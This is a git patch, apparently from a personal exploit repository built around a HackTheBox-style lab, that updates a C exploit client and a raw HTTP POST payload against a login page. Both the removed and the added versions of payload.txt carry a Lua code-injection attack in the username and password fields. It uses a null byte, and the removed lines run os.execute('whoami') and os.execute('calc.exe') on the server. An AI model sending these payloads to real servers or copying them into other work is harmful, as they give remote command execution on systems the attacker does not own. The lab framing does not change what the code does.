From ba426950aed392aec5aa6e2b87882956c2e386fa Mon Sep 17 00:00:00 2001
From: hexplor <hexplor@hexplor.com>
Date: Sat, 25 Apr 2026 23:14:49 +0200
Subject: [PATCH] updte

---
 exploit.c   |  2 ++
 payload.txt | 18 +++++++++++++-----
 2 files changed, 15 insertions(+), 5 deletions(-)

diff --git a/exploit.c b/exploit.c
index fd96b78..1b04beb 100644
--- a/exploit.c
+++ b/exploit.c
@@ -44,10 +44,12 @@ int main(int argc, char** argv){
   }
   send(fd, "\r\n", 2, 0);
   int n;
+  printf("recv:\n");
   while (( n = recv(fd, buffer, 99, 0)) > 0){
 	  buffer[n] = 0;
 	  printf("%s", buffer);
   }
   fclose(fichier_out);
+  free(file_buffer);
   return 0;
 }
diff --git a/payload.txt b/payload.txt
index fd9e145..f47c850 100644
--- a/payload.txt
+++ b/payload.txt
@@ -1,15 +1,23 @@
 POST /loginok.html HTTP/1.1
-Host: ftp.wingdata.htb
-Content-Length: 173
+Host: localhost
+Content-Length: 65
 Cache-Control: max-age=0
+sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
 Accept-Language: fr-FR,fr;q=0.9
-Origin: http://ftp.wingdata.htb
+Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://ftp.wingdata.htb/login.html
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/login.html?lang=french
 Accept-Encoding: gzip, deflate, br
 Cookie: client_lang=french
 Connection: keep-alive
-username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27whoami%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--
+
+username=anonymous%00]]%0d[[print(os.date("today is %A, in %B"))&password=&username_val=anonymous&password_val=